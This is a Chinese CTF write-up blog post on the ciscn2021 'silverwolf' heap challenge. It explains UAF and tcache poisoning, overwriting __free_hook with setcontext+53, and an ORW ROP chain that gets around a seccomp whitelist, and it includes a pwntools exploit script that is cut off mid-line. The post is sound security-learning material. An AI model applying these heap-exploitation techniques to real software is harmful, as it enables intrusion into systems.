<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"a2ur2.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="例题是来自ciscn2021初赛的silverwolf，原本只是用来练习利用setcontext去orw">
<meta property="og:type" content="article">
<meta property="og:title" content="努力成长的pwn弟系列-【2】由silverwolf得到的各种新姿势">
<meta property="og:url" content="https://a2ur2.github.io/2022/08/30/%E5%8A%AA%E5%8A%9B%E6%88%90%E9%95%BF%E7%9A%84pwn%E5%BC%9F%E7%B3%BB%E5%88%97-%E3%80%902%E3%80%91%E7%94%B1silverwolf%E5%BE%97%E5%88%B0%E7%9A%84%E5%90%84%E7%A7%8D%E6%96%B0%E5%A7%BF%E5%8A%BF/index.html">
<meta property="og:site_name" content="A2ur2的梦想小屋">
<meta property="og:description" content="例题是来自ciscn2021初赛的silverwolf，原本只是用来练习利用setcontext去orw">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s1.ax1x.com/2022/08/25/v2emHP.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/08/25/v2eaNT.jpg">
<meta property="og:image" content="https://s1.ax1x.com/2022/08/30/vhXRts.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/08/30/vhX7BF.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/08/30/vhXLN9.png">
<meta property="article:published_time" content="2022-08-29T16:00:00.000Z">
<meta property="article:modified_time" content="2022-08-30T12:11:06.316Z">
<meta property="article:author" content="A2ur2">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s1.ax1x.com/2022/08/25/v2emHP.png">

<link rel="canonical" href="https://a2ur2.github.io/2022/08/30/%E5%8A%AA%E5%8A%9B%E6%88%90%E9%95%BF%E7%9A%84pwn%E5%BC%9F%E7%B3%BB%E5%88%97-%E3%80%902%E3%80%91%E7%94%B1silverwolf%E5%BE%97%E5%88%B0%E7%9A%84%E5%90%84%E7%A7%8D%E6%96%B0%E5%A7%BF%E5%8A%BF/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>努力成长的pwn弟系列-【2】由silverwolf得到的各种新姿势 | A2ur2的梦想小屋</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">A2ur2的梦想小屋</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">我许下的愿望该向谁去说明</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://a2ur2.github.io/2022/08/30/%E5%8A%AA%E5%8A%9B%E6%88%90%E9%95%BF%E7%9A%84pwn%E5%BC%9F%E7%B3%BB%E5%88%97-%E3%80%902%E3%80%91%E7%94%B1silverwolf%E5%BE%97%E5%88%B0%E7%9A%84%E5%90%84%E7%A7%8D%E6%96%B0%E5%A7%BF%E5%8A%BF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="A2ur2">
      <meta itemprop="description" content="在成为大赛pwn题签到员的路上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="A2ur2的梦想小屋">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          努力成长的pwn弟系列-【2】由silverwolf得到的各种新姿势
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-08-30 00:00:00 / 修改时间：20:11:06" itemprop="dateCreated datePublished" datetime="2022-08-30T00:00:00+08:00">2022-08-30</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>例题是来自ciscn2021初赛的silverwolf，原本只是用来练习利用setcontext去orw<span id="more"></span>没想到翻查各大师傅wp时发现这个题目有各种各样的pwn姿势，一个题目能搞出好几个exp，着实对本菜🐥幼小的心灵造成了不小冲击，于是我决定不白蓝要好好学习时，就把这些定成了小目标一一学习复现。弟弟我冲了，不然fallw1nd又要pua我了。</p>
<p>题目大概程序就是只能控制id为0的堆块，存在UAF漏洞，开了沙箱白名单，只允许open read 和write的系统调用，很ez是吧（</p>
<h2 id="一、setcontext-orw（libc-lt-2-29）"><a href="#一、setcontext-orw（libc-lt-2-29）" class="headerlink" title="一、setcontext+orw（libc&lt;2.29）"></a>一、setcontext+orw（libc&lt;2.29）</h2><h3 id="1、setcontext"><a href="#1、setcontext" class="headerlink" title="1、setcontext"></a>1、setcontext</h3><p>setcontext是libc中一段根据rdi去索引相对应的值，然后将这些值mov进寄存器的一段汇编。在libc-2.29以下，它长介个样子</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x7f638914d070</span> &lt;setcontext&gt;: <span class="keyword">push</span>   <span class="built_in">rdi</span></span><br><span class="line"><span class="number">0x7f638914d071</span> &lt;setcontext+<span class="number">1</span>&gt;:       <span class="keyword">lea</span>    <span class="built_in">rsi</span>,[<span class="built_in">rdi</span>+<span class="number">0x128</span>]</span><br><span class="line"><span class="number">0x7f638914d078</span> &lt;setcontext+<span class="number">8</span>&gt;:       <span class="keyword">xor</span>    <span class="built_in">edx</span>,<span class="built_in">edx</span></span><br><span class="line"><span class="number">0x7f638914d07a</span> &lt;setcontext+<span class="number">10</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">edi</span>,<span class="number">0x2</span></span><br><span class="line"><span class="number">0x7f638914d07f</span> &lt;setcontext+<span class="number">15</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">r10d</span>,<span class="number">0x8</span></span><br><span class="line"><span class="number">0x7f638914d085</span> &lt;setcontext+<span class="number">21</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">eax</span>,<span class="number">0xe</span></span><br><span class="line"><span class="number">0x7f638914d08a</span> &lt;setcontext+<span class="number">26</span>&gt;:      <span class="keyword">syscall</span> </span><br><span class="line"><span class="number">0x7f638914d08c</span> &lt;setcontext+<span class="number">28</span>&gt;:      <span class="keyword">pop</span>    <span class="built_in">rdi</span></span><br><span class="line"><span class="number">0x7f638914d08d</span> &lt;setcontext+<span class="number">29</span>&gt;:      <span class="keyword">cmp</span>    <span class="built_in">rax</span>,<span class="number">0xfffffffffffff001</span></span><br><span class="line"><span class="number">0x7f638914d093</span> &lt;setcontext+<span class="number">35</span>&gt;:      <span class="keyword">jae</span>    <span class="number">0x7f638914d0f0</span> &lt;setcontext+<span class="number">128</span>&gt;</span><br><span class="line"><span class="number">0x7f638914d095</span> &lt;setcontext+<span class="number">37</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">rcx</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0xe0</span>]</span><br><span class="line"><span class="number">0x7f638914d09c</span> &lt;setcontext+<span class="number">44</span>&gt;:      <span class="keyword">fldenv</span> [<span class="built_in">rcx</span>]</span><br><span class="line"><span class="number">0x7f638914d09e</span> &lt;setcontext+<span class="number">46</span>&gt;:      <span class="keyword">ldmxcsr</span> <span class="built_in">DWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0x1c0</span>]</span><br><span class="line"><span class="number">0x7f638914d0a5</span> &lt;setcontext+<span class="number">53</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">rsp</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0xa0</span>]</span><br><span class="line"><span class="number">0x7f638914d0ac</span> &lt;setcontext+<span class="number">60</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">rbx</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0x80</span>]</span><br><span class="line"><span class="number">0x7f638914d0b3</span> &lt;setcontext+<span class="number">67</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">rbp</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0x78</span>]</span><br><span class="line"><span class="number">0x7f638914d0b7</span> &lt;setcontext+<span class="number">71</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">r12</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0x48</span>]</span><br><span class="line"><span class="number">0x7f638914d0bb</span> &lt;setcontext+<span class="number">75</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">r13</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0x50</span>]</span><br><span class="line"><span class="number">0x7f638914d0bf</span> &lt;setcontext+<span class="number">79</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">r14</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0x58</span>]</span><br><span class="line"><span class="number">0x7f638914d0c3</span> &lt;setcontext+<span class="number">83</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">r15</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0x60</span>]</span><br><span class="line"><span class="number">0x7f638914d0c7</span> &lt;setcontext+<span class="number">87</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">rcx</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0xa8</span>]</span><br><span class="line"><span class="number">0x7f638914d0ce</span> &lt;setcontext+<span class="number">94</span>&gt;:      <span class="keyword">push</span>   <span class="built_in">rcx</span></span><br><span class="line"><span class="number">0x7f638914d0cf</span> &lt;setcontext+<span class="number">95</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">rsi</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0x70</span>]</span><br><span class="line"><span class="number">0x7f638914d0d3</span> &lt;setcontext+<span class="number">99</span>&gt;:      <span class="keyword">mov</span>    <span class="built_in">rdx</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0x88</span>]</span><br><span class="line"><span class="number">0x7f638914d0da</span> &lt;setcontext+<span class="number">106</span>&gt;:     <span class="keyword">mov</span>    <span class="built_in">rcx</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0x98</span>]</span><br><span class="line"><span class="number">0x7f638914d0e1</span> &lt;setcontext+<span class="number">113</span>&gt;:     <span class="keyword">mov</span>    <span class="built_in">r8</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0x28</span>]</span><br><span class="line"><span class="number">0x7f638914d0e5</span> &lt;setcontext+<span class="number">117</span>&gt;:     <span class="keyword">mov</span>    <span class="built_in">r9</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0x30</span>]</span><br><span class="line"><span class="number">0x7f638914d0e9</span> &lt;setcontext+<span class="number">121</span>&gt;:     <span class="keyword">mov</span>    <span class="built_in">rdi</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rdi</span>+<span class="number">0x68</span>]</span><br><span class="line"><span class="number">0x7f638914d0ed</span> &lt;setcontext+<span class="number">125</span>&gt;:     <span class="keyword">xor</span>    <span class="built_in">eax</span>,<span class="built_in">eax</span></span><br><span class="line"><span class="number">0x7f638914d0ef</span> &lt;setcontext+<span class="number">127</span>&gt;:     <span class="keyword">ret</span>    </span><br><span class="line"><span class="number">0x7f638914d0f0</span> &lt;setcontext+<span class="number">128</span>&gt;:     <span class="keyword">mov</span>    <span class="built_in">rcx</span>,<span class="built_in">QWORD</span> <span class="built_in">PTR</span> [<span class="built_in">rip</span>+<span class="number">0x398d71</span>]</span><br><span class="line"><span class="number">0x7f638914d0f7</span> &lt;setcontext+<span class="number">135</span>&gt;:     <span class="keyword">neg</span>    <span class="built_in">eax</span></span><br><span class="line"><span class="number">0x7f638914d0f9</span> &lt;setcontext+<span class="number">137</span>&gt;:     <span class="keyword">mov</span>    <span class="built_in">DWORD</span> <span class="built_in">PTR</span> <span class="built_in">fs</span>:[<span class="built_in">rcx</span>],<span class="built_in">eax</span></span><br><span class="line"><span class="number">0x7f638914d0fc</span> &lt;setcontext+<span class="number">140</span>&gt;:     <span class="keyword">or</span>     <span class="built_in">rax</span>,<span class="number">0xffffffffffffffff</span></span><br><span class="line"><span class="number">0x7f638914d100</span> &lt;setcontext+<span class="number">144</span>&gt;:     <span class="keyword">ret</span></span><br></pre></td></tr></table></figure>

<p>而我们要从<strong>setcontext+53</strong>开始利用，因为再次之前这个 fldenv [rcx] 会导致程序crash。从汇编中我们可以看出，setcontext可以设置除了rax之外的一系列寄存器，把他们🐏成👴想要的值，rip寄存器由于ret之前把rcx的值给push进了栈里面，所以我们也能控制了rip。最后最后，不可控的rax寄存器，因为xor eax，eax这条汇编的存在，所以它一定会先被设置成0。好！rax寄存是0！<del>👴一开始并不明白为什么这个0会让大伙如此兴奋，难不成大伙都是1吗（bushi</del></p>
<p>rax寄存器是存放返回结果的寄存器，也用来存放系统调用号，我们没法通过setcontext控制rax，但通过类似栈迁移的手法执行rop控制寄存器。</p>
<p>我们能控制rsp和rip，就能把栈劫持到我们的可控区域，类似栈迁移，提前在可控区域布置好rop链就可以劫持我们的栈到上面，从而控制程序执行流进行orw。除此之外我们也可以选择调用mprotect函数，在可控区域提前布置好shellcode。</p>
<p>这题看了chuj师傅博客中尝试leak libc的方法–  malloc_consolidate leak ，将top chunk耗尽后触发 small request 的 malloc_consolidate 会让fastbin都经过一次unsorted bin，这样就有libc，但这题目开的白名单，耗尽top chunk后会调用brk（）这一系统调用去增长堆空间，在这里程序会crash。在布局时要垫高和topchunk的距离，不然会被认为topchunk大小不够从而调用brk（）导致crash。另外在尝试的过程中发现，free的过程中，貌似不仅要伪造好当前堆块＋size位的chunk头，过程中好像还会一直根据size去检索，直到top chunk（留个坑，没看源码捏），所以堆布局要构造好。</p>
<h3 id="2、解题思路"><a href="#2、解题思路" class="headerlink" title="2、解题思路"></a>2、解题思路</h3><p><strong>libc:2.27-3ubuntu1.5_amd64</strong></p>
<p>题目限制了malloc的大小，所以我的想法是用在堆块中伪造一个chunk头，然后tcache posion申请到这个fake chunk，再free掉它从而构造出unsorted bin。通过tcache直接获得堆地址（这题本地调试会自己malloc和free很多堆块，我从里面随便挑了一个size的申请，然后show就有heap_addr）</p>
<p>然后打free_hook为setcontext+53，由于我们只能控制id为0的堆块，所以得先free一个堆块chunk1作为铺垫，再在该chunk1堆块往高地址的地方布置rop链，最后再申请回chunk1，将其free作为rdi的参数，由于申请size大小限制，得分开布局rop，其中要注意我们chunk的size位也会被当作rop链的一部分，所以需要连续的pop指令，不然ret会返回的地址会变成size从而导致程序crash</p>
<h3 id="3、exp"><a href="#3、exp" class="headerlink" title="3、exp"></a>3、exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#python2</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">p=process(<span class="string">&#x27;./silverwolf&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./silverwolf&#x27;</span>)</span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">menu</span>(<span class="params">choice</span>):</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Your choice:&quot;</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params"><span class="built_in">id</span>,size</span>):</span><br><span class="line">    menu(<span class="number">1</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Index:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;:&quot;</span>,<span class="built_in">str</span>(size))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params"><span class="built_in">id</span>,data</span>):</span><br><span class="line">    menu(<span class="number">2</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Index:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Content:&quot;</span>,<span class="built_in">str</span>(data))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params"><span class="built_in">id</span></span>):</span><br><span class="line">    menu(<span class="number">3</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Index:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params"><span class="built_in">id</span></span>):</span><br><span class="line">    menu(<span class="number">4</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Index:&quot;</span>,<span class="built_in">str</span>(<span class="built_in">id</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment">#add(0,0x18)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#edit(0,&#x27;flag.txt\n&#x27;)</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x8</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;Content: &quot;</span>)</span><br><span class="line">heap_addr=u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))-<span class="number">0x1790</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(heap_addr))</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x38</span>)</span><br><span class="line">edit(<span class="number">0</span>,p64(<span class="number">0</span>)+p64(<span class="number">0x511</span>)+p64(heap_addr+<span class="number">0x10d0</span>))</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line"><span class="comment">#edit(0,heap_addr)</span></span><br><span class="line"><span class="comment">#add(0,0x38)</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">pause()</span><br><span class="line">edit(<span class="number">0</span>,p64(heap_addr+<span class="number">0x1930</span>))</span><br><span class="line">chunk_head=p64(<span class="number">0</span>)+p64(<span class="number">0x31</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">15</span>):</span><br><span class="line">  add(<span class="number">0</span>,<span class="number">0x58</span>)</span><br><span class="line">  edit(<span class="number">0</span>,p64(<span class="number">0</span>)*<span class="number">6</span>+chunk_head)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line">pause()</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x68</span>)</span><br><span class="line"><span class="comment">#edit(0,&#x27;aaaaaaa&#x27;)</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"><span class="comment">#pause()</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">raw_input(<span class="string">&#x27;enter&#x27;</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">libc=u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>))-<span class="number">0x3ebca0</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc))</span><br><span class="line">setcontext=libc+<span class="number">0x52050</span>+<span class="number">53</span></span><br><span class="line">free_hook=libc+<span class="number">0x3ed8e8</span></span><br><span class="line">write=libc+<span class="number">0x1100f0</span></span><br><span class="line">read=libc+<span class="number">0x110020</span></span><br><span class="line">openadd=libc+<span class="number">0x10fbf0</span></span><br><span class="line">pop_rdi_rbp=libc+<span class="number">0x0000000000022394</span></span><br><span class="line">pop_rdi=libc+<span class="number">0x000000000002164f</span></span><br><span class="line">pop_rsi=libc+<span class="number">0x0000000000023a6a</span></span><br><span class="line">pop_rdx=libc+<span class="number">0x0000000000001b96</span></span><br><span class="line">pop_rax=libc+<span class="number">0x000000000001b500</span></span><br><span class="line">syscall=libc+<span class="number">0x00000000000d2625</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x78</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">edit(<span class="number">0</span>,p64(free_hook)*<span class="number">2</span>)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x18</span>)</span><br><span class="line">edit(<span class="number">0</span>,<span class="string">&#x27;./flag\x00&#x27;</span>)</span><br><span class="line">flag_addr=heap_addr+<span class="number">0x1610</span></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x28</span>)</span><br><span class="line">edit(<span class="number">0</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0x28</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x78</span>)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x78</span>)</span><br><span class="line">edit(<span class="number">0</span>,p64(setcontext)*<span class="number">2</span>)</span><br><span class="line">pd=p64(<span class="number">9</span>)+<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x10</span>+p64(<span class="number">12</span>)+p64(<span class="number">13</span>)+p64(<span class="number">14</span>)+p64(<span class="number">15</span>)+p64(flag_addr)+p64(<span class="number">2</span>)+p64(<span class="number">0</span>)+p64(<span class="number">0xaa</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x58</span>)</span><br><span class="line">edit(<span class="number">0</span>,pd)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">raw_input(<span class="string">&#x27;gdb&#x27;</span>)</span><br><span class="line">add(<span class="number">0</span>,<span class="number">0x78</span>)</span><br><span class="line">pd=<span class="string">b&#x27;a&#x27;</span>*<span class="number">8</span>+p64(<span class="number">0xaa</span>)+p64(heap_addr+<span class="number">0x19d0</span>)+p64(pop_rax)</span><br><span class="line">pd+=p64(<span class="number">2</span>)+p64(syscall)+p64(pop_rdi)+p64(<span 